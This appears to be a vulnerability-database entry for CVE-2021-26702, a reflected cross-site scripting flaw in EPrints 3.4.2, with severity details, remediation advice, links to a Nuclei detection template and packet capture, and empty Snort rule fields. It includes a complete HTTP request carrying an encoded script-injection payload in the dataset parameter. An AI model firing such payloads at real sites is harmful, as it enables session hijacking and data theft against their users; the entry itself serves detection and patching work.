🔙 목록으로 돌아가기

CVE-2021-26702: EPrints 3.4.2 - Cross-Site Scripting

TitleEPrints 3.4.2 - Cross-Site Scripting
Authorritikchaddha
SeverityMedium
ImpactSuccessful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.
RemediationApply the latest security patches or upgrade to a newer version of EPrints that addresses this vulnerability.
CVSS Score6.1
EPSS Score0.04853
CVE IDCVE-2021-26702
CWE IDCWE-79
Tags cve2021 cve xss eprints vuln

🔍 Vulnerability Description

EPrints 3.4.2 contains a reflected cross-site scripting vulnerability in the dataset parameter to the cgi/dataset_ dictionary URI.

🌐 HTTP Request

GET /cgi/dataset_dictionary?dataset=zulu%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.2 Safari/605.1.15
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2021/CVE-2021-26702.yaml

🦈 Packet Capture: ⬇️ Download cve-2021-26702.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A